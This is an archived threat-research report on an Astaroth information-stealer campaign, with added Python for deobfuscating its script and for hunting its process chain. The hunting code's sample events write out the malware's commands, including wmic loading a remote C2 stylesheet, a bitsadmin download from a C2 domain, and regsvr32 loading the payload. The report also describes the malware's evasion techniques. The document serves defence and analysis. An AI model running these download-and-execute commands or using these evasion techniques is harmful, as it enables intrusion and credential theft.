{
	"id": "e95cd0af-8537-4116-bf23-b2ca5b2d48b0",
	"created_at": "2026-04-06T00:18:38.743953Z",
	"updated_at": "2026-04-10T03:21:19.209032Z",
	"deleted_at": null,
	"sha1_hash": "45a4d9df3042f5e2b744171d01fa58f470eb884c",
	"title": "Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 529361,
	"plain_text": "Astaroth Malware Uses Legitimate OS and Antivirus Processes to Steal Passwords and Personal Data\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-02 11:11:27 UTC\r\nResearch By: Eli Salem\r\nIn 2018, we saw a dramatic increase in cyber crime in Brazil and, separately, in the abuse of legitimate native Windows OS processes for malicious purposes. Attackers used living off the land binaries (LOLbins) to hide their activity and operate stealthily on target systems. By driving native, legitimate operating system tools, they were able to infiltrate devices and gain remote access without deploying conventional malware. For organizations with limited visibility into their environment, this type of attack can be devastating.\r\nIn this research, we explain one of the most recent and unique campaigns involving the Astaroth Trojan. This Trojan and information stealer was observed in Europe and chiefly affected Brazil through the abuse of native OS processes and the exploitation of security-related products.\r\nPervasive Brazilian Financial Malware Targets Bank Customers in Latin America and Europe\r\nThe Cybereason Platform detected this new variant of the Astaroth Trojan in a massive spam campaign that targeted Brazil and parts of Europe. Our Active Hunting Service team analyzed the campaign and identified that it abused legitimate tools, the BITSAdmin utility and the WMIC utility, to interact with a C2 server and download a payload. It also used a component of the multinational antivirus software Avast to gain information about the target system, as well as a process belonging to the Brazilian information security company GAS Tecnologia to gather personal information. With a sophisticated attack such as this, it is critical for your security team to have a clear understanding of your environment so they can swiftly detect malicious activity and respond effectively. 
\r\nUnique Aspects to this Latest Version of the Astaroth Trojan Campaign\r\nThe Astaroth Trojan campaign is a phishing-based campaign that gained momentum towards the end of 2018 and was identified in thousands of incidents. Early versions differed significantly from later versions as the adversaries advanced and optimized their attack. This version differs from previous versions in four key ways.\r\n1. This version maliciously used BITSAdmin to download the attackers' payload. Early versions of the campaign used certutil instead.\r\n2. This version injects a malicious module into one of Avast's processes, whereas early versions of the campaign detected Avast and quit. As Avast is one of the most widely installed antivirus products in the world, this is an effective evasion strategy: the malicious code runs inside a signed process that defenders expect to see.\r\nhttps://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research\r\nPage 1 of 14\n\n3. This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected. This trusted process is prevalent on Brazilian machines. To the best of our knowledge, no other versions of the malware used this process.\r\n4. This version used a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide the code it initiates. Earlier versions did not use this method.\r\nA Breakdown of the Latest Astaroth Trojan Spam Campaign\r\nAs with many traditional spam campaigns, this campaign begins with a 7-Zip archive. The archive reaches the user machine as a mail attachment or through a link clicked by mistake.\r\nThe downloaded archive contains a .lnk file that, once opened, initializes the malware.\r\nThe .lnk file extracted from the archive.\r\nAn obfuscated command is located in the Target field of the .lnk file properties. 
\r\nHidden command inside the .lnk file.\r\nThe full obfuscated command inside the .lnk file.\r\nWhen the .lnk file is opened, it spawns a cmd.exe process. This process executes a command that abuses the legitimate wmic.exe to perform XSL Script Processing (MITRE Technique T1220): wmic.exe is pointed, through its /format switch, at an XSL stylesheet hosted on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw), and the JScript or VBScript embedded in that stylesheet is executed locally inside the wmic.exe process.\r\nwmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI). It can execute complex WQL queries and WMI methods, and attackers often use it for lateral movement, reconnaissance, and basic code invocation. By using a trusted, native utility, the attackers hide the scope of the full attack and evade detection.\r\nThe initial attack vector as detected by the Cybereason Platform.\r\nwmic.exe creates a .txt file with information about the domain that hosts the remote XSL script. It also records the location of the infected machine, including country, city, and other information. Once this information is gathered, it is sent to the remote XSL script.\r\nThis location data gives the attacker a unique edge: they can restrict the attack to a target country or city and maximize their accuracy when choosing a particular target.\r\nThe .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment.\r\nPhase one: An Analysis of the Remote XSL\r\nThe remote XSL script that wmic.exe sends information to contains highly obfuscated JScript code that executes the next steps of the malicious activity. 
The code is obfuscated to hide the malicious activity from anyone inspecting the remote server.\r\nInitially, the XSL script defines several variables for command execution and data storage. It also creates several ActiveX objects. Objects created from WScript.Shell and Shell.Application are typically used to run programs, create shortcuts, manipulate the registry, or access system folders. Here they are used to invoke legitimate Windows OS processes for malicious purposes, and they serve as a bridge between the remote domain that hosts the script and the infected machine.\r\nMalicious script variables.\r\nObfuscation Mechanism for the JScript Code\r\nThe obfuscation of the malicious JScript code relies on two main techniques.\r\n1. The script uses String.fromCharCode(), which returns a string built from a sequence of UTF-16 code units. By encoding strings as lists of numeric code units, the script avoids writing the commands it executes in plain text and hides the code it initiates. In particular, the script uses this function to hide process names. To the best of our knowledge, this method was not used in early versions of the spam campaign.\r\n2. The script uses the function radador(), which returns a random integer. With it, every iteration of the code is presented differently. In contrast to the first method, this technique has been used since early versions of the Astaroth Trojan campaign.\r\nString.fromCharCode() usage in the XSL script. 
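The following is an added example written for this page; it is not code from the Cybereason research or from the Astaroth script itself. It performs, statically, the two decoding steps a researcher applies to this obfuscation by hand: every String.fromCharCode(...) call with a numeric argument list is replaced by the string it builds, u-escaped (backslash-u) string literals are decoded, and simple var assignments that only concatenate string literals and already-resolved variables are folded together, so that a path split across several stem variables (the technique used for the aswRunDll.exe path in the Detecting Avast section below) is recovered in one piece. The JScript fragment it runs on is constructed for the example and only mirrors the structure described here; the variable names stem1, stem2, stem3 and ShA follow the blog.

```python
import re

# Constructed JScript fragment modelled on the obfuscation described on this
# page (it is NOT the real XSL script). The three stems concatenate to the
# Avast aswRunDll.exe path once decoded; ShA mirrors the Shell.Application
# object the script creates.
SAMPLE_JSCRIPT = '''var stem1 = String.fromCharCode(67,58,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92);
var stem2 = '\\u0041\\u0056\\u0041\\u0053\\u0054\\u0020\\u0053\\u006f\\u0066\\u0074\\u0077\\u0061\\u0072\\u0065\\u005c';
var stem3 = String.fromCharCode(65,86,65,83,84,92,97,115,119,82,117,110,68,108,108,46,101,120,101);
var ShA = new ActiveXObject(String.fromCharCode(83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110));
var avastPath = stem1 + stem2 + stem3;
'''

QUOTE = chr(39)  # single quote; chr() keeps the patterns free of escape noise
# String.fromCharCode(...) with a plain numeric argument list.
FROMCHARCODE = re.compile(re.escape('String.fromCharCode(') + '([0-9, ]*)' + re.escape(')'))
# A JScript u-escape inside a string literal: backslash, u, four hex digits.
UNICODE_ESC = re.compile(re.escape(chr(92)) + 'u([0-9a-fA-F]{4})')
# A single-quoted string literal with no embedded quote.
STRING_LIT = re.compile(QUOTE + '([^' + QUOTE + ']*)' + QUOTE)
# var name = expression;
ASSIGN = re.compile('var ([A-Za-z_][A-Za-z0-9_]*) = (.*?);')
IDENT = re.compile('^[A-Za-z_][A-Za-z0-9_]*$')


def decode_fromcharcode(args):
    # String.fromCharCode takes UTF-16 code units; chr() covers the BMP range used here.
    return ''.join(chr(int(n)) for n in args.split(',') if n.strip())


def decode_unicode_escapes(text):
    return UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)


def inline_fromcharcode(js):
    # Replace every fromCharCode call with the equivalent quoted literal.
    return FROMCHARCODE.sub(lambda m: QUOTE + decode_fromcharcode(m.group(1)) + QUOTE, js)


def evaluate_term(term, known):
    # A term is one operand of a '+' chain: a string literal or a known variable.
    term = term.strip()
    lit = STRING_LIT.fullmatch(term)
    if lit:
        return decode_unicode_escapes(lit.group(1))
    if IDENT.match(term) and term in known:
        return known[term]
    return None  # a call, a number, or an identifier we could not resolve


def resolve_assignments(js):
    # Walk the script top to bottom, folding constant string expressions so
    # stems split across several variables are re-joined. Expressions that
    # depend on runtime state (ActiveX calls etc.) are left unresolved.
    known = {}
    for name, expr in ASSIGN.findall(js):
        parts = [evaluate_term(t, known) for t in expr.split('+')]
        if parts and all(p is not None for p in parts):
            known[name] = ''.join(parts)
    return known


def deobfuscate(js):
    return resolve_assignments(inline_fromcharcode(js))


if __name__ == '__main__':
    print(inline_fromcharcode(SAMPLE_JSCRIPT))
    for name, value in deobfuscate(SAMPLE_JSCRIPT).items():
        print(name, '=', value)
```

Because the folding evaluates only constant string expressions, anything that depends on runtime state (an ActiveX call, a value read from the .txt file sent to the C2) stays unresolved, which is the safe behaviour: the script is never executed. A decoded string that itself contains a plus sign or a quote would need a real tokenizer rather than the split used here.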
\r\nThe random number generator function radador().\r\nThese two obfuscation techniques are used to bypass antivirus defenses and to make investigation by security researchers more difficult.\r\nChoosing a C2 Server\r\nThe XSL script contains a variable xparis() that holds the C2 domain from which the malicious files will be downloaded. To extend the lifespan of the infrastructure in case one or more domains are blacklisted, there are twelve different C2 domains that xparis() can be set to. To decide which domain xparis() holds, a variable pingadori() uses the radador() function to pick one at random: pingadori() is a random integer between one and twelve, and it selects which domain xparis() is assigned.\r\nThe C2 domain selection mechanism.\r\nOne of the most used functions in the XSL script is Bxaki(). Bxaki() takes a URL and a file name as arguments. It downloads the file to the infected machine from the given URL using BITSAdmin, and is called every time the script attempts to download a file.\r\nIn previous iterations, the Astaroth Trojan campaign used certutil to download files; to hide this, the binary was renamed certis. In this iteration, certutil has been replaced with BITSAdmin.\r\nBxaki obfuscated function.\r\nBxaki deobfuscated function.\r\nTo access the infected computer’s file system, the XSL script uses the variable fso, a FileSystemObject created through an ActiveX object. The XSL script also contains hard-coded variables sVarRaz and sVar2RazX, which hold the file paths of the downloaded files.\r\nThe file’s path.\r\nThe directory creation. 
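As an added example (not part of the original research and not the Cybereason platform's own logic), the following Python hunting rule replays a handful of constructed process-creation records, in the shape Sysmon Event ID 1 or EDR telemetry provides (parent image, image, command line), and flags the LOLbin chain described on this page: wmic.exe started by cmd.exe with a /format: switch that points at a remote XSL stylesheet, bitsadmin.exe transferring files into C:\\Users\\Public\\Libraries\\tempsys, and regsvr32.exe or aswRunDll.exe loading a module from that directory (the loading step is described in the Manipulating Avast section below). The utility names, the tempsys path and the two domains come from this page; the URL paths, the BITS job name, the field names and the two benign records are invented for the example.

```python
from dataclasses import dataclass

# Staging directory named on this page; compared case-insensitively.
TEMPSYS = 'c:\\users\\public\\libraries\\tempsys'
# Loaders this variant uses for the downloaded module.
MODULE_LOADERS = {'regsvr32.exe', 'aswrundll.exe'}


@dataclass
class ProcessEvent:
    # Minimal shape of a process-creation record (Sysmon Event ID 1 or EDR
    # telemetry); the field names are chosen for this example.
    parent_image: str
    image: str
    command_line: str


def basename(path):
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def remote_format_target(command_line):
    # Return the URL handed to wmic /format: when it is remote, else None.
    # A remote XSL means the script embedded in the stylesheet runs inside
    # wmic.exe (MITRE T1220); a local format name is routine admin use.
    low = command_line.lower()
    idx = low.find('/format:')
    if idx < 0:
        return None
    rest = command_line[idx + len('/format:'):].split()
    if not rest:
        return None
    target = rest[0].strip(chr(34) + chr(39))
    return target if target.lower().startswith(('http://', 'https://')) else None


def hunt(events):
    # Apply each rule to every event; return (rule, detail, event) triples.
    findings = []
    for ev in events:
        image = basename(ev.image)
        parent = basename(ev.parent_image)
        low = ev.command_line.lower()
        if image == 'wmic.exe':
            url = remote_format_target(ev.command_line)
            if url:
                # Parent cmd.exe matches the .lnk -> cmd.exe -> wmic.exe chain.
                detail = 'remote XSL ' + url + (' via cmd.exe' if parent == 'cmd.exe' else '')
                findings.append(('wmic_remote_xsl', detail, ev))
        elif image == 'bitsadmin.exe' and '/transfer' in low and TEMPSYS in low:
            findings.append(('bitsadmin_to_tempsys', ev.command_line, ev))
        elif image in MODULE_LOADERS and TEMPSYS in low:
            findings.append(('module_loaded_from_tempsys', image, ev))
    return findings


# Constructed events that replay the chain described on this page. The URL
# paths, the BITS job name and the two benign records are invented.
SAMPLE_EVENTS = [
    ProcessEvent('C:\\Windows\\explorer.exe', 'C:\\Windows\\System32\\cmd.exe',
                 'cmd.exe /c wmic.exe os get /format:http://qnccmvbrh.wilstonbrwsaq[.]pw/v.xsl'),
    ProcessEvent('C:\\Windows\\System32\\cmd.exe', 'C:\\Windows\\System32\\wbem\\WMIC.exe',
                 'wmic.exe os get /format:http://qnccmvbrh.wilstonbrwsaq[.]pw/v.xsl'),
    ProcessEvent('C:\\Windows\\System32\\wbem\\WMIC.exe', 'C:\\Windows\\System32\\bitsadmin.exe',
                 'bitsadmin /transfer job1 /priority foreground '
                 'http://19analiticsx00220a[.]com/lrdsnhrxxfery64.~ '
                 'C:\\Users\\Public\\Libraries\\tempsys\\lrdsnhrxxfery64.~'),
    ProcessEvent('C:\\Windows\\System32\\wbem\\WMIC.exe', 'C:\\Windows\\System32\\regsvr32.exe',
                 'regsvr32 /s C:\\Users\\Public\\Libraries\\tempsys\\lrdsnhrxxfery64.~'),
    ProcessEvent('C:\\Windows\\System32\\wbem\\WMIC.exe',
                 'C:\\Program Files\\AVAST Software\\AVAST\\aswRunDll.exe',
                 'aswRunDll.exe C:\\Users\\Public\\Libraries\\tempsys\\lrdsnhrxxfery64.~'),
    # Benign: an admin using a local format name, and a normal DLL registration.
    ProcessEvent('C:\\Windows\\System32\\cmd.exe', 'C:\\Windows\\System32\\wbem\\WMIC.exe',
                 'wmic.exe os get /format:list'),
    ProcessEvent('C:\\Windows\\System32\\msiexec.exe', 'C:\\Windows\\System32\\regsvr32.exe',
                 'regsvr32 /s C:\\Program Files\\Vendor\\component.dll'),
]


if __name__ == '__main__':
    for rule, detail, ev in hunt(SAMPLE_EVENTS):
        print(rule, '|', detail, '|', basename(ev.parent_image), '->', basename(ev.image))
```

Two design points matter in practice: the rule keys on the wmic.exe event itself rather than on the cmd.exe command line, so it fires even when the .lnk launches wmic.exe directly, and it requires a remote URL in /format:, so routine administrative use of wmic with a local format name (list, csv, or a stylesheet under System32\\wbem) does not alert.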
\r\nDownloading the Payloads\r\nThe remote XSL script downloads twelve files from the C2 server that masquerade as JPEG, GIF, and extensionless files. These files are downloaded by Bxaki() and xparis() to a directory (C:\\Users\\Public\\Libraries\\tempsys) on the infected machine. Among these twelve files are the Astaroth Trojan modules, several additional files the Trojan may use to extend its capabilities, and an r1.log file. The r1.log file stores information staged for exfiltration. A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018.\r\nThe script verifies all parts of the malware have been downloaded.\r\nAfter downloading the payload, the XSL script checks that every piece of the malware was downloaded.\r\nOne of the twelve download commands as detected by the Cybereason platform in the same variant of Astaroth.\r\nThe twelve downloaded files.\r\nDetecting Avast\r\nA unique feature of this latest Astaroth Trojan campaign is the malware's ability to search for specific security products and exploit them. In earlier variants, upon detecting Avast, the XSL script would simply quit. Now it uses Avast to execute malicious actions instead.\r\nAs in earlier versions of the Astaroth Trojan campaign, the XSL script searches for Avast on the infected machine, and specifically targets one Avast process, aswrundll.exe. It uses three variables stem1, stem2, and stem3 that, when concatenated, form the path to aswRundll.exe (C:\\Program Files\\AVAST Software\\AVAST\\aswRunDll.exe). The path is obfuscated with the fromCharCode() function.\r\naswrundll.exe is the Avast Software Runtime Dynamic Link Library, responsible for running Avast modules. 
If aswrundll.exe exists at this path, Avast is present on the machine.\r\nNote: aswrundll.exe is very similar to Microsoft’s own rundll32.exe: it executes DLLs by calling their exported functions. The use of aswrundll.exe as a LOLbin has been mentioned in the past year.\r\nStem variables presented as unicode strings.\r\nStem variables decoded to ASCII.\r\nManipulating Avast\r\nOnce the XSL script has identified that Avast is installed on the machine, it loads the malicious module Irdsnhrxxxfery64 from its location on disk. To load this module, it uses an ActiveX object ShA created from Shell.Application. The object calls ShellExecute() to create an aswrundll.exe process instance that loads Irdsnhrxxxfery64. It passes the vShow parameter as zero, so the application starts with a hidden window.\r\nAlternatively, if Avast is not installed on the machine, the malicious module is loaded using regsvr32.exe. regsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry; because registering a DLL means loading it and calling its DllRegisterServer export, it doubles as a signed loader for the module.\r\nThe script attempts to load the malicious module using regsvr32 through the Run method.\r\nProcmon shows the malicious module loaded into the Avast process.\r\nProcmon shows the malicious module loaded using the regsvr32.exe process.\r\nPhase two: Payload Analysis\r\nThe only module the XSL script loads directly is Irdsnhrxxxfery64, which is packed with the UPX packer.\r\nInformation pertaining to lrdsnhxxfery64.~.\r\nAfter UPX unpacking, the module turns out to be packed with an additional inner packer, Pe123\\RPolyCryptor. 
This module has to be investigated dynamically to fully understand the malware and the role the module plays during execution.\r\nInformation pertaining to lrdsnhrxxfery64_Unpacked.dll.\r\nThroughout the malware execution, Irdsnhrxxxfery64.~ acts as the main malware controller. The module initiates the malicious activity once the payload download is complete. It executes the other modules and collects initial information about the machine, including the network configuration, locale, and keyboard language.\r\nThe main module collecting information about the machine.\r\nContinuing Malicious Activity and Manipulating Additional Security Products\r\nAfter the module is loaded by regsvr32.exe, Irdsnhrxxxfery64 injects another module, Irdsnhrxxxfery98, which the script downloaded, into regsvr32.exe using the LoadLibraryExW() function. As in the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 is injected into that process instead of regsvr32.exe.\r\nIrdsnhrxxxfery64 injecting lrdsnhrxxfery98.\r\nThe malicious modules in regsvr32.exe memory.\r\nAfter the Irdsnhrxxxfery98 module is loaded, the malware searches for different processes in which to continue its malicious activity, depending on how Irdsnhrxxxfery64 was loaded.\r\n1. If Irdsnhrxxxfery64 was loaded using aswrundll.exe, the module continues to target aswrundll.exe. It creates new instances and keeps injecting malicious content into them.\r\n2. If Irdsnhrxxxfery64 was loaded using regsvr32.exe, it targets one of three processes, in order of preference:\r\nIt targets unins000.exe if it is available. unins000.exe is a process developed by GAS Tecnologia that is common on Brazilian machines.\r\nIf unins000.exe does not exist, it targets Syswow64\\userinit.exe. 
userinit.exe is a native Windows process, launched by Winlogon when a user logs on, that runs logon scripts and starts the user's shell. If neither unins000.exe nor Syswow64\\userinit.exe exists, it targets System32\\userinit.exe.\r\nThe malware searches for targeted processes.\r\nIrdsnhrxxxfery64 manipulation on userinit.exe \u0026 unins000.exe.\r\nInjection Technique To Increase Stealthiness\r\nAfter locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093, now catalogued as T1055.012) to run its code under the identity of a legitimate executable. It creates a new process from the legitimate image in a suspended state (dwCreationFlags set to CREATE_SUSPENDED, value 4), unmaps the original image from the new process, writes its own content into newly allocated space, and then resumes the suspended process. With this technique the malware runs from a signed and verified Windows OS process, or, if aswrundll.exe or unins000.exe exists, from a signed and verified security product process.\r\nAstaroth module creates a process in a suspended state (dwCreationFlags set to 4).\r\nUnmapping process memory.\r\nWriting content and resuming the process.\r\nThe Cybereason platform detected the malicious injection, identifying Irdsnhrxxxfery64.~, Irdsnhrxxxfery98.~, and the module arqueiro.\r\nThe downloaded modules found in regsvr32.exe as detected by the Cybereason platform.\r\nData Exfiltration\r\nThe second module, Irdsnhrxxxfery98.~, is responsible for the bulk of the information stealing. It collects data through hooking, reading the clipboard, and monitoring the key state.\r\nIrdsnhrxxxfery98 information collecting capabilities.\r\nIn addition to its own information stealing capabilities, the Astaroth Trojan campaign also uses an external tool, NetPass. 
NetPass is one of the downloaded payload files, renamed to lrdsnhrxxferyb.jpg.\r\nNetPass is a free network password recovery tool that, according to its developer NirSoft, can recover passwords including:\r\nLogin passwords of remote computers on the LAN.\r\nPasswords of mail accounts on an Exchange server stored by Microsoft Outlook.\r\nPasswords of MSN Messenger and Windows Messenger accounts.\r\nInternet Explorer 7.x and 8.x passwords for password-protected web sites that use Basic Authentication or Digest Access Authentication.\r\nThe item name of Internet Explorer 7 passwords, which always begins with the Microsoft_WinInet prefix.\r\nThe passwords stored by Remote Desktop 6.\r\nNetPass usage.\r\nAttack Flow and Exfiltration\r\nAfter injecting into the targeted processes, the modules continue their malicious activity through those processes. The malware runs a short burst of activity inside the target process, deletes itself, and then repeats. This occurs periodically and is persistent.\r\nThe malware’s different functionality.\r\nOnce the targeted processes are infected by the malicious modules, they begin communicating with the payload C2 server and exfiltrating the information saved in the r1.log file. The communication and exfiltration of data were detected in a real-world scenario using the Cybereason platform.\r\nThe malicious use of the GAS Tecnologia security process unins000.exe.\r\nData exfiltration from unins000.exe to a malicious IP.\r\nConclusion\r\nOur Active Hunting Service detected both the malicious use of the BITSAdmin utility and the WMIC utility. Our customer immediately stopped the attack using the remediation section of our platform and prevented any exfiltration of data. 
From there, our hunting team identified the rest of the attack and completed a thorough analysis.\r\nWe were able to detect and evaluate an evasive infection technique used to spread a variant of the Astaroth Trojan as part of a large, Brazil-based spam campaign. We highlighted the use of legitimate, built-in Windows OS processes to perform malicious activity and deliver a payload without being detected, and showed how the Astaroth Trojan operates and covertly installs multiple modules. We also showed its use of well-known tools and antivirus products to expand its capabilities. The analysis of the tools and techniques used in the Astaroth campaign shows how effective LOLbins are at evading antivirus products. As we enter 2019, we anticipate that the use of LOLbins will increase. Because of the great potential for abuse inherent in native processes, it is very likely that many other information stealers will adopt this method to deliver their payload to targeted machines.\r\nAs a result of this detection, the customer was able to contain an advanced attack before any damage was done. The Astaroth Trojan was contained, WMIC was disabled, and the attack was halted in its tracks.\r\nPart of the difficulty in identifying this attack is how it evades detection. It is difficult to catch even for security teams that are aware of the complications of keeping a system secure, as with our customer above. LOLbins are deceptive because their execution seems benign at first, or even safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. 
The potential for damage will grow as attackers turn to other, more destructive payloads.\r\nFor more information on LOLbins in the wild, read our research into a different Trojan: LOLbins and Trojans: How the Ramnit Trojan Spreads via sLoad in a Cyberattack.\r\nIndicators of Compromise\r\nEach entry lists the indicator value, its type, its category and, for file hashes, the file name. Note that the same SHA1 is listed for lrdsnhrxxferydwwn.gif and lrdsnhrxxferye.jpg, so those two names refer to identical content.\r\n01782747C12Bf06A52704A144DB59FEC41B3CB36 SHA1 Hash NF-e513468.zip\r\n1F83403398964D4E8B6C70B171C51CD278909172 SHA1 Hash Script.js\r\nCE8BDB56CCAC55C6881701EBD39DA316EE7ED18D SHA1 Hash lrdsnhrxxfery64.~\r\n926137A50f473BBD257CD19E207C1C9114F6B215 SHA1 Hash lrdsnhrxxfery98.~\r\n5579E03EB1DA076EF939196CB14F8B769F30A302 SHA1 Hash lrdsnhrxxferyb.jpg\r\nB2734835888756929EE3FF4DCDE85080CB299D2A SHA1 Hash lrdsnhrxxferyc.jpg\r\n206352E13D601239E2D043D971EA6657C091071A SHA1 Hash lrdsnhrxxferydwwn.gif\r\nEAE82A63A980998F8D388BCCE7D967F28309F593 SHA1 Hash lrdsnhrxxferydwwn.gif\r\n9CD5A399C9320CBFB87C9D1CAD3BC366FB12E54F SHA1 Hash lrdsnhrxxferydx.gif\r\n206352E13D601239E2D043D971EA6657C091071A SHA1 Hash lrdsnhrxxferye.jpg\r\n4CDE9A53A9A49D606BC89E74D47398A69E767056 SHA1 Hash lrdsnhrxxferyg.gif\r\nF99319B1B321AE9F2D1F0361BC756A43D25444CE SHA1 Hash lrdsnhrxxferygx.gif\r\nB85C106B68ED410107f97A2CC38b7EC05353F1FA SHA1 Hash lrdsnhrxxferyxa.~\r\n77809236FDF621ABE37B32BF073B0B893E9CE67A SHA1 Hash lrdsnhrxxferyxb.~\r\nC2F3350AC58DE900768032554C009C4A78C47CCC SHA1 Hash r1.log\r\n104.129.204[.]41 IP C2\r\n63.251.126[.]7 IP C2\r\n195.157.15[.]100 IP C2\r\n173.231.184[.]59 IP C2\r\n64.95.103[.]181 IP C2\r\n19analiticsx00220a[.]com Domain C2\r\nqnccmvbrh.wilstonbrwsaq[.]pw Domain C2\r\nAbout the Author\r\nCybereason Nocturnus\r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nSource: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research"
	],
	"report_names": [
		"information-stealing-malware-targeting-brazil-full-research"
	],
	"threat_actors": [],
	"ts_created_at": 1775434718,
	"ts_updated_at": 1775791279,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/45a4d9df3042f5e2b744171d01fa58f470eb884c.pdf",
		"text": "https://archive.orkl.eu/45a4d9df3042f5e2b744171d01fa58f470eb884c.txt",
		"img": "https://archive.orkl.eu/45a4d9df3042f5e2b744171d01fa58f470eb884c.jpg"
	}
}